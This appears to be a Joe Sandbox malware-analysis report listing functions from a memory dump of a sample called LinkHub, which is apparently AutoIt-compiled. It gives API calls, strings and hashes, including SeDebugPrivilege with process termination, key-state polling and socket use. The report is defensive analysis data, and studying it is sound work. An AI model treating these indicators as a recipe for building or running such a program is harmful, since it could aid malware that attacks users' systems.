                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        • Opcode ID: 77af76d04e7201412ebbd4de2d86f72ef51f5c9d2b7670f3768630da541536d5
                                                                                        • Instruction ID: 92458b8fe9438c1c75bc3f4bae5fd33623f8342160b0c433186c0821e431f32d
                                                                                        • Opcode Fuzzy Hash: 77af76d04e7201412ebbd4de2d86f72ef51f5c9d2b7670f3768630da541536d5
                                                                                        • Instruction Fuzzy Hash: 5A619D74225242AFE710EF14C485F16BBA4AF54308F18849EE4568B7E3CB71EC95CF92
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002943C1
                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 002943D6
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002943F0
                                                                                        • _wcslen.LIBCMT ref: 00294435
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00294462
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00294490
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcslen
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 2147712094-78025650
                                                                                        • Opcode ID: 0552dfc6e60e3c5d991f2c7389fca2f0c8fc18a604cb510f1309df35df703272
                                                                                        • Instruction ID: 3f103f6d6452fb82a040bd144d9d88640d806727ab2f2635e0a342da3e5dc65e
                                                                                        • Opcode Fuzzy Hash: 0552dfc6e60e3c5d991f2c7389fca2f0c8fc18a604cb510f1309df35df703272
                                                                                        • Instruction Fuzzy Hash: 3F41C131910319ABDF21EFA4CC49FEA7BA9FF08350F10016AF948E7291D77099A1DB90
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0026C6C4
                                                                                        • IsMenu.USER32(00000000), ref: 0026C6E4
                                                                                        • CreatePopupMenu.USER32 ref: 0026C71A
                                                                                        • GetMenuItemCount.USER32(00AC6728), ref: 0026C76B
                                                                                        • InsertMenuItemW.USER32(00AC6728,?,00000001,00000030), ref: 0026C793
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                        • String ID: 0$2
                                                                                        • API String ID: 93392585-3793063076
                                                                                        • Opcode ID: d05c4480b6f0c7029e20b4d593502d149f81a8d91ec97e7be2c8c9aa504a6281
                                                                                        • Instruction ID: f8ddb75037e326a49ea540070970c181f7a6556f5e5220671cc2057928149726
                                                                                        • Opcode Fuzzy Hash: d05c4480b6f0c7029e20b4d593502d149f81a8d91ec97e7be2c8c9aa504a6281
                                                                                        • Instruction Fuzzy Hash: F951B0706112069BDF12EF68D888BBEFBFCAF54314F34412AE89197291D7709990CF61
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 002019E1
                                                                                        • ScreenToClient.USER32(00000000,?), ref: 002019FE
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00201A23
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00201A3D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID: $' $$'
                                                                                        • API String ID: 4210589936-2353634435
                                                                                        • Opcode ID: b3ad7db5a1926513fffc264ea7e46c0765f1be609a550fc1f9c12ed3cf3af8a8
                                                                                        • Instruction ID: f4f69079f2b001b4f7ae1882e5fd6abcaf59c40671a2a8fc065d83da40818e17
                                                                                        • Opcode Fuzzy Hash: b3ad7db5a1926513fffc264ea7e46c0765f1be609a550fc1f9c12ed3cf3af8a8
                                                                                        • Instruction Fuzzy Hash: 42414E71A1420ABFDF19DF64D844BEEB774FF05324F20821AE429A22D1C7706A64DF51
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • BeginPaint.USER32(?,?,?), ref: 00201B35
                                                                                        • GetWindowRect.USER32(?,?), ref: 00201B99
                                                                                        • ScreenToClient.USER32(?,?), ref: 00201BB6
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00201BC7
                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00201C15
                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00243287
                                                                                          • Part of subcall function 00201C2D: BeginPath.GDI32(00000000), ref: 00201C4B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                        • String ID: (-
                                                                                        • API String ID: 3050599898-4239615555
                                                                                        • Opcode ID: 6064822e4a15e852ae35b625979c45436acf7ceef002eddfec7ad1b29cda33f0
                                                                                        • Instruction ID: 1c4b61a3826ab2dc2eb3dc2bbf965e0f97a21412286439dcb0b5180843352660
                                                                                        • Opcode Fuzzy Hash: 6064822e4a15e852ae35b625979c45436acf7ceef002eddfec7ad1b29cda33f0
                                                                                        • Instruction Fuzzy Hash: 4E41E030515301AFD710DF24EC88FBA7BA8EB55324F10066AFA54872E2C7709C69DB62
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00298740
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00298765
                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0029877D
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 002987A6
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0027C1F2,00000000), ref: 002987C6
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 002987B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                        • String ID: (-
                                                                                        • API String ID: 2294984445-4239615555
                                                                                        • Opcode ID: 5babe21eacb50c2cb9024e744de31c839ca5fec53f6785c2894a13fa8f7d060a
                                                                                        • Instruction ID: 41e5db88ca8a65684193b0201ed8b99f2d37ef6d0faae04f903823e8ba33566b
                                                                                        • Opcode Fuzzy Hash: 5babe21eacb50c2cb9024e744de31c839ca5fec53f6785c2894a13fa8f7d060a
                                                                                        • Instruction Fuzzy Hash: 65219775520242DFCF145F78DC48AAAB7A5EB45325F39462EF926D21E0EE309861DB10
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0026D1BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: 81bfe60f9f5f59db67beb512ec857cfb1239d0525b94b2ec51873d31a0186162
                                                                                        • Instruction ID: d3cb5f77a5f294c2b8a9fe6c4ec128a947e28580eda7718b366e72bd3be99b11
                                                                                        • Opcode Fuzzy Hash: 81bfe60f9f5f59db67beb512ec857cfb1239d0525b94b2ec51873d31a0186162
                                                                                        • Instruction Fuzzy Hash: 3411EC35BBC31FBAE7155F64EC82EAA779CDF07760B2000AAF508A61C1D7F45AA145A0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 642191829-3771769585
                                                                                        • Opcode ID: a34c1703c6a900ca9e2e4b13915bd2dcdb3e45adc26490c7a22e2ee865762500
                                                                                        • Instruction ID: 37d6e8d93fe9c0463f3a09f6e25dff342f9b8a757c00bb6b043e9085429c13c5
                                                                                        • Opcode Fuzzy Hash: a34c1703c6a900ca9e2e4b13915bd2dcdb3e45adc26490c7a22e2ee865762500
                                                                                        • Instruction Fuzzy Hash: 1511D6359241257BDF217BA4EC4EEDEB7ACEF01710F020176F605A6091EFB48AE19E50
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 952045576-0
                                                                                        • Opcode ID: fb37a82e4739fc08f07716ca269dc1ece15b1f2b80618347759d98d40cda01b3
                                                                                        • Instruction ID: b8c84ce4849b4754767a5d603ecf0a8e57476c254252fa0d51a4bbcfb01c0f25
                                                                                        • Opcode Fuzzy Hash: fb37a82e4739fc08f07716ca269dc1ece15b1f2b80618347759d98d40cda01b3
                                                                                        • Instruction Fuzzy Hash: D741A565C20225B5CB11EBF8EC8AADFB76CAF05310F504462F508E3121FA74D271C7A6
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 002937B7
                                                                                        • GetDC.USER32(00000000), ref: 002937BF
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002937CA
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 002937D6
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00293812
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00293823
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00296504,?,?,000000FF,00000000,?,000000FF,?), ref: 0029385E
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0029387D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
APIs
• GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00241B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0024194E
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00241B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002419D1
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00241B7B,?,00241B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00241A64
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00241B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00241A7B
  • Part of subcall function 00233B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00220165,?,?,002711D9,0000FFFF), ref: 00233BC5
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00241B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00241AF7
• __freea.LIBCMT ref: 00241B22
• __freea.LIBCMT ref: 00241B2E
Similarity
• API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
• String ID:
• API String ID: 2829977744-0
APIs
Strings
Similarity
• API ID: Variant$ClearInit
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2610073882-625585964
APIs
• VariantInit.OLEAUT32(?), ref: 002843C8
• CharUpperBuffW.USER32(?,?), ref: 002844D7
• _wcslen.LIBCMT ref: 002844E7
• VariantClear.OLEAUT32(?), ref: 0028467C
  • Part of subcall function 0027169E: VariantInit.OLEAUT32(00000000), ref: 002716DE
  • Part of subcall function 0027169E: VariantCopy.OLEAUT32(?,?), ref: 002716E7
  • Part of subcall function 0027169E: VariantClear.OLEAUT32(?), ref: 002716F3
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
APIs
  • Part of subcall function 002608FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?,?,00260C4E), ref: 0026091B
  • Part of subcall function 002608FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?), ref: 00260936
  • Part of subcall function 002608FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?), ref: 00260944
  • Part of subcall function 002608FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?), ref: 00260954
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 002856AE
• _wcslen.LIBCMT ref: 002857B6
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0028582C
• CoTaskMemFree.OLE32(?), ref: 00285837
Strings
Similarity
• API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 614568839-2785691316
APIs
• GetMenu.USER32(?), ref: 00292C1F
• GetMenuItemCount.USER32(00000000), ref: 00292C51
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00292C79
• _wcslen.LIBCMT ref: 00292CAF
• GetMenuItemID.USER32(?,?), ref: 00292CE9
• GetSubMenu.USER32(?,?), ref: 00292CF7
  • Part of subcall function 00264393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002643AD
  • Part of subcall function 00264393: GetCurrentThreadId.KERNEL32 ref: 002643B4
  • Part of subcall function 00264393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00262F00), ref: 002643BB
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00292D7F
  • Part of subcall function 0026F292: Sleep.KERNEL32 ref: 0026F30A
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
• API String ID: 4196846111-0
APIs
• GetParent.USER32(?), ref: 0026B8C0
• GetKeyboardState.USER32(?), ref: 0026B8D5
• SetKeyboardState.USER32(?), ref: 0026B936
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0026B964
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0026B983
• PostMessageW.USER32(?,00000101,00000012,?), ref: 0026B9C4
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 0026B9E7
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(00000000), ref: 0026B6E0
• GetKeyboardState.USER32(?), ref: 0026B6F5
• SetKeyboardState.USER32(?), ref: 0026B756
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0026B782
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0026B79F
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0026B7DE
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0026B7FF
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00235F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 002357E3
• __fassign.LIBCMT ref: 0023585E
• __fassign.LIBCMT ref: 00235879
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0023589F
• WriteFile.KERNEL32(?,FF8BC35D,00000000,00235F16,00000000,?,?,?,?,?,?,?,?,?,00235F16,?), ref: 002358BE
• WriteFile.KERNEL32(?,?,00000001,00235F16,00000000,?,?,?,?,?,?,?,?,?,00235F16,?), ref: 002358F7
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
• _ValidateLocalCookies.LIBCMT ref: 002230BB
• ___except_validate_context_record.LIBVCRUNTIME ref: 002230C3
• _ValidateLocalCookies.LIBCMT ref: 00223151
• __IsNonwritableInCurrentImage.LIBCMT ref: 0022317C
• _ValidateLocalCookies.LIBCMT ref: 002231D1
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
APIs
  • Part of subcall function 00283AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00283AD7
  • Part of subcall function 00283AAB: _wcslen.LIBCMT ref: 00283AF8
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00281B6F
• WSAGetLastError.WSOCK32 ref: 00281B7E
• WSAGetLastError.WSOCK32 ref: 00281C26
• closesocket.WSOCK32(00000000), ref: 00281C56
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
APIs
  • Part of subcall function 0026E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0026D7CD,?), ref: 0026E714
  • Part of subcall function 0026E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0026D7CD,?), ref: 0026E72D
• lstrcmpiW.KERNEL32(?,?), ref: 0026D7F0
• MoveFileW.KERNEL32(?,?), ref: 0026D82A
• _wcslen.LIBCMT ref: 0026D8B0
• _wcslen.LIBCMT ref: 0026D8C6
• SHFileOperationW.SHELL32(?), ref: 0026D90C
Strings
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \*.*
• API String ID: 3164238972-1173974218
APIs
• GetInputState.USER32 ref: 00274310
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 00274367
• TranslateMessage.USER32(?), ref: 00274390
• DispatchMessageW.USER32(?), ref: 0027439A
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002743AB
Strings
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID: (-
• API String ID: 2256411358-4239615555
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002938B8
• GetWindowLongW.USER32(?,000000F0), ref: 002938EB
• GetWindowLongW.USER32(?,000000F0), ref: 00293920
• SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00293952
• SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0029397C
• GetWindowLongW.USER32(?,000000F0), ref: 0029398D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 002939A7
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002680D0
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002680F6
• SysAllocString.OLEAUT32(00000000), ref: 002680F9
• SysAllocString.OLEAUT32(?), ref: 00268117
• SysFreeString.OLEAUT32(?), ref: 00268120
• StringFromGUID2.OLE32(?,?,00000028), ref: 00268145
• SysAllocString.OLEAUT32(?), ref: 00268153
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002681A9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002681CF
• SysAllocString.OLEAUT32(00000000), ref: 002681D2
• SysAllocString.OLEAUT32 ref: 002681F3
• SysFreeString.OLEAUT32 ref: 002681FC
• StringFromGUID2.OLE32(?,?,00000028), ref: 00268216
• SysAllocString.OLEAUT32(?), ref: 00268224
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00270E99
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00270ED5
Strings
                                                                                        Similarity
                                                                                        • API ID: CreateHandlePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 1424370930-2873401336
                                                                                        • Opcode ID: 86c7de10c0f6c77e0745b2391fa7371cc5fe8898bb5b430f16aec809fbfe90b9
                                                                                        • Instruction ID: 1cbbd586f9b172f62945f463f85e3d78cdbf69abc4977cea124bfe17d5d63949
                                                                                        • Opcode Fuzzy Hash: 86c7de10c0f6c77e0745b2391fa7371cc5fe8898bb5b430f16aec809fbfe90b9
                                                                                        • Instruction Fuzzy Hash: 4F21917451030AEBDB309F25DC84A9A77E8BF54320F208A19FCA9D72D0DBB09864DB51
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00270F6D
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00270FA8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
